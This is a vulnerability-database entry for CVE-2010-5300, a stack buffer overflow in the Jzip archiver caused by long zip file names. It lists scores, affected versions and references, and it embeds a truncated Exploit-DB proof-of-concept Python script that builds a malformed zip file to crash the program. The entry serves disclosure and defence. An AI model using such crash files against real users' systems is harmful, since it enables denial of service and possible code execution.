CVE-2010-5300
Published 2014-06-11
Priority: P3 · 40 · medium · CVSS 2.0: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 14.62% (96.2th percentile)
Stack-based buffer overflow in Jzip 1.3 through 2.0.0.132900 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long file name in a zip archive.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jzip | jzip | — | — |
| jzip | jzip | — | — |
No detection rules found.
Exploit-DB
Jzip - Buffer Overflow (PoC) (SEH Unicode)
exploitdb·2014-04-16
---
```python
#!/usr/bin/python
######################################################
# Exploit title: seh unicode buffer overflow (DOS)
# Date: 16/04/2014
# Exploit Author: motaz reda [motazkhodair[at]gmail.com]
# Software Link : http://www.jzip.com/
# Version: jZip v2.0.0.132900
# Tested On: Windows 7 ultimate
########################################################
import sys, os
filename = "vuln.zip"
buffer = "\x50\x4B\x03\x04\x14\x00\x00"
buffer += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\xe4\x0f"
buffer += "\x00\x00\x00"
eo = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eo += "\x12\x10\x00\x00"
eo += "\x02\x10\x00\x00"
eo += "\x00\x00"
cdf = "\x50\x4B\x01\x02\x14\x00\x14"
cdf +=
```
Exploit-DB
Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)
exploitdb·2010-04-06
---
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/65041
http://packetstormsecurity.com/files/126216/Jzip-2.0.0.132900-Buffer-Overflow.html
http://seclists.org/fulldisclosure/2010/Apr/79
http://www.exploit-db.com/exploits/32899
https://www.corelan.be/index.php/forum/security-advisories-archive-2010/corelan-10-021-jzip-zip-seh-bof